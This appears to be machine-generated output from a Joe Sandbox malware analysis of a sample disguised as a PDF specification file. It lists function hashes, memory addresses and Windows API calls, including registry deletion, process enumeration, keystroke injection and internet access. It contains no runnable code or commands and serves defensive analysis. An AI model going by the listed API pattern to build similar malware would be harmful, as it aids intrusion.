                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                      • Instruction ID: e4432852f016f0459d2772ff6f3b745ee8266f024fe34b29598d2b7de5bfeb6e
                                      • Opcode Fuzzy Hash: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                      • Instruction Fuzzy Hash: 3FD05E308047129FCB325F20B848A62B6D8AB00300F154429E943D2294DB70D880C710
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,003A3BD1,?,003A3E06), ref: 003A3BE9
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A3BFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                      • Instruction ID: 49e85fc247e58c8b241aaa922c4848b87589f87ff4ef3096afbcd92e1997dfc4
                                      • Opcode Fuzzy Hash: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                      • Instruction Fuzzy Hash: 00D0A7705007169FC7225F60EC09A93BAF8EB03324F154429F446E2150D6B0D4808F10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                      • Instruction ID: fd3d77edfc775469d0c2ebfa93aaceacd1d848d2db7fb93f6a9ebc3a6e415d03
                                      • Opcode Fuzzy Hash: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                      • Instruction Fuzzy Hash: 51C15E75A00216EFDB26CF94C884BAEB7B5FF48700F118699E909AB251D734DE41DB90
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0039AAB4
                                      • CoUninitialize.OLE32 ref: 0039AABF
                                        • Part of subcall function 00380213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                      • VariantInit.OLEAUT32(?), ref: 0039AACA
                                      • VariantClear.OLEAUT32(?), ref: 0039AD9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                      • Instruction ID: 339ad5db0db9b953a462aacbf78acb55809a8b609ee3fa3e57c1f59d0b3efb2a
                                      • Opcode Fuzzy Hash: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                      • Instruction Fuzzy Hash: FCA11775204B019FCB12EF14C491B1AB7E5BF89710F154959FA969B3A2CB30FD44CB86
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                      • Instruction ID: 4a570ee69782b057961b2c55c23706b030bc818a1af9cf0de45cd87d133fd1dc
                                      • Opcode Fuzzy Hash: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                      • Instruction Fuzzy Hash: 42518334604706DBEB36AF669491B2AB3E9EF45310F20C91FE54ECB6E1DB7898408701
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 003A1C18
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 003A1C26
                                      • Process32NextW.KERNEL32(00000000,?), ref: 003A1CDF
                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003A1CF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                      • Instruction ID: c289d8a0083bfe5643d19b3b145ef06300fee609edd48481965fe7855dba6d2f
                                      • Opcode Fuzzy Hash: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                      • Instruction Fuzzy Hash: 26515E711043409FD722EF64D885EABB7ECEF89754F04492EF9859B261EB70E904CB92
                                      APIs
                                      • GetWindowRect.USER32(00F270F0,?), ref: 003AC544
                                      • ScreenToClient.USER32(?,00000002), ref: 003AC574
                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003AC5DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                      • Instruction ID: ae7704ff4e610db82a3968491d15c67685d99661c08a5059cfcc72c9a6aa7cdb
                                      • Opcode Fuzzy Hash: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                      • Instruction Fuzzy Hash: 8A517E75910208EFCF12DF68C980AAE7BB5FF56320F159669F8659B2A0D730ED41CB90
                                      APIs
                                        • Part of subcall function 003671EF: GetOEMCP.KERNEL32(00000000), ref: 00367218
                                        • Part of subcall function 003669D0: Sleep.KERNEL32(00000000,00000000,00000000,00000000,?,00367DBD,00000018,003F6D60,00000008,00367D0B,00000000,00000000,?,00367ADD,0000000D), ref: 003669F2
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367573
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00367599
                                      • InterlockedDecrement.KERNEL32 ref: 00367634
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00367658
                                        • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                        • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                      • String ID:
                                      • API String ID: 1703371082-0
                                      • Opcode ID: a516c680f17b3c08c5ee8b932b5032cd441aca8f3b5abb39836fec612802ceef
                                      • Instruction ID: db32e2d3211a383800278316890fe0a1f65eaca6ddf313a3b75f4d684f6f185a
                                      • Opcode Fuzzy Hash: a516c680f17b3c08c5ee8b932b5032cd441aca8f3b5abb39836fec612802ceef
                                      • Instruction Fuzzy Hash: 14410774908A448FCB139F7CD98466C7BA4AF08318F65C16AF859DF6AACB34CC42CB50
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00383966
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00383982
                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003839EF
                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00383A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                      • Instruction ID: a457334c801127a980f3d3c8ef0624527be43fd4a298193a39f596ceb2089a20
                                      • Opcode Fuzzy Hash: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                      • Instruction Fuzzy Hash: 35411870A04348AEEF37AB64C805BFEBBB9AB55710F04019AF4C1963C1C7B89E85D765
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003AB5D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                      • Instruction ID: f32c62ff7b14702936334e142a8a837137ffb0584581416bc67c9f5d20c38a3d
                                      • Opcode Fuzzy Hash: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                      • Instruction Fuzzy Hash: 3131E034A00204BFEF268F18CC89FA8BB68EB07350F554611FA51E65F3C734A9508B51
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 003AD807
                                      • GetWindowRect.USER32(?,?), ref: 003AD87D
                                      • PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                      • MessageBeep.USER32(00000000), ref: 003AD8FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                      • Instruction ID: afec7bab69813dc1888a5163318aca7911a751a74dad17672e2630f3772166d6
                                      • Opcode Fuzzy Hash: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                      • Instruction Fuzzy Hash: A3418970A00218DFCB12DF58D884BA9BBF9FF4A311F1981A9E816DF660D739E941CB40
                                      APIs
                                      • GetKeyboardState.USER32(?,7617A2E0,?,00008000), ref: 00383AB8
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00383AD4
                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00383B34
                                      • SendInput.USER32(00000001,?,0000001C,7617A2E0,?,00008000), ref: 00383B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                      • Instruction ID: 58d410d1e4e4de7fe155e829d406c92d0e27cc837bfcfed8a480d8010d1d7753
                                      • Opcode Fuzzy Hash: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                      • Instruction Fuzzy Hash: 5E3144B0A04348AEEF23AB64C819BFEBBAA9F45710F05019AE481973D1C7749F45C765
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 003A7CB9
                                        • Part of subcall function 00385F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00385F6F
                                        • Part of subcall function 00385F55: GetCurrentThreadId.KERNEL32 ref: 00385F76
                                        • Part of subcall function 00385F55: AttachThreadInput.USER32(00000000,?,0038781F), ref: 00385F7D
                                      • GetCaretPos.USER32(?), ref: 003A7CCA
                                      • ClientToScreen.USER32(00000000,?), ref: 003A7D03
                                      • GetForegroundWindow.USER32 ref: 003A7D09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                      • Instruction ID: 78e49cc4643def858039ca1dd4bfb63128408b1c039cb26ed58e75e8f18e5ed4
                                      • Opcode Fuzzy Hash: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                      • Instruction Fuzzy Hash: 8C311E71900108AFDB01EFA9CC85DEFBBFDEF55314B118466F915E7221DA319E058BA0
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0037DBD7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037DBF4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037DC2C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037DC52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow
                                      • String ID:
                                      • API String ID: 2796087071-0
                                      • Opcode ID: 0b83c821261b99f5529f6faeaee09bcac8b948ecf05db70e2fee4c6a186f78a0
                                      • Instruction ID: c26d60b69847ac4005d964bc2a4d44a2e1c4e4a4612d2917868701de13120456
                                      • Opcode Fuzzy Hash: 0b83c821261b99f5529f6faeaee09bcac8b948ecf05db70e2fee4c6a186f78a0
                                      • Instruction Fuzzy Hash: 6621FF72204205ABEB279B29DC49E7B7BACDF45760F118039F80ECA191EAA5D841D3A0
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,?,?,?,003860C3), ref: 00386369
                                      • GetLastError.KERNEL32(?,?,?,003860C3), ref: 00386374
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 00386388
                                        • Part of subcall function 00386318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 003863E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: 4e4826ac47694c8226aafe0e2e70fa3d9bb510a8ca53b8e1d9284e6d7f961816
                                      • Instruction ID: 61dc453720a22617a3da3f6afc890792b722f0c29c8044454745045a075441b1
                                      • Opcode Fuzzy Hash: 4e4826ac47694c8226aafe0e2e70fa3d9bb510a8ca53b8e1d9284e6d7f961816
                                      • Instruction Fuzzy Hash: 5C21C3395043159BDB27BA78AC47FEA23ACAF06360F1044B9F445DB0E5EBE0A9849B54
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetCursorPos.USER32(?), ref: 003AF211
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003BE4C0,?,?,?,?,?), ref: 003AF226
                                      • GetCursorPos.USER32(?), ref: 003AF270
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003BE4C0,?,?,?), ref: 003AF2A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                      • Instruction ID: a2dcfe44b0f796414d48b1e1fe28469362e19f7c3dc0cb7912966ba1525c5c64
                                      • Opcode Fuzzy Hash: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                      • Instruction Fuzzy Hash: A021803D500018AFCB169F94CC98EFA7BB9EF4A710F058869F9099B2A1D3319951DB50
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00394358
                                        • Part of subcall function 003943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                        • Part of subcall function 003943E2: InternetCloseHandle.WININET(00000000), ref: 0039449E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                      • Instruction ID: 7cb79759bf4b9686747e53ff8a06b8daddb32e7581e94d8bc6a02c4ccb94307e
                                      • Opcode Fuzzy Hash: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                      • Instruction Fuzzy Hash: 5321A17A200605BBEF179F709C40FBBB7ADFF44711F14401ABA15D6A50DB71A8329B90
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003A8AA6
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8AC0
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8ACE
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003A8ADC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      APIs
                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00398AE0
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00398AF2
